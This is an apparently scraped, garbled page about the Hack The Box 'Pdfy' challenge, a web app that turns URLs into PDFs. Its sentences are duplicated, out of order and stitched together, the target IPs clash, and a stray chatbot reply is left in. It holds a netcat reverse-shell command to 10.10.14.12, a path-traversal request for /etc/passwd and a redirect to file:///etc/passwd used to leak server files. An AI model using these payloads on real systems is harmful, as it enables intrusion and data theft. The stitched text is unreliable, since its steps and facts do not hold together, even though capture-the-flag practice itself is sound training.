Pdfy Htb Writeup Upd [upd] -
The generated PDF will contain the contents of /etc/passwd , where the flag is appended. Download or view the PDF to obtain the flag.
# Close the socket s.close()
# Establish a reverse shell os.system('nc 10.10.14.12 4444 -e /bin/bash')
Your server responds with a 302 Redirect to file:///etc/passwd . pdfy htb writeup upd
The modified PDF file is then uploaded to the system.
We can test this vulnerability by attempting to access a non-existent file using the file parameter:
While the box is straightforward, many beginners get stuck on the syntax or identifying the internal targets. This updated writeup covers the most efficient path to the user flag and explains the mechanics behind the exploit. 1. Enumeration: What are we working with? The generated PDF will contain the contents of
Then, use ngrok to create a TCP tunnel to this port. This is an important nuance.
http://10.10.10.187/?file=../../../../etc/passwd
If you want, I can expand this into a full step-by-step writeup with exact commands, payloads, and screenshots for each stage — tell me which level of detail (brief, full, or forensic). The modified PDF file is then uploaded to the system
During our enumeration, we usually discover the application relies on an underlying HTML-to-PDF generation library (such as wkhtmltopdf ). Understanding the technology stack is half the battle; it allows us to look for known Common Vulnerabilities and Exposures (CVEs) or configuration flaws specific to that software.
$ curl -s 10.10.11.206 <!DOCTYPE html> <html> <head> <title>Pdfy</title> </head> <body> <h1>Pdfy</h1> <p><a href="pdf_file.pdf">Pdf File</a></p> </body> </html>
A web application that converts provided URLs into PDF documents. Vulnerability: Insecure URL handling during PDF generation.
(Note: If you use a reverse proxy or tunneling tool, use standard TCP forwarding configurations instead of standard HTTP modes to ensure headers pass smoothly without intermediary confirmation pages.) Step 3: Execute the Payload Injection Navigate back to the target .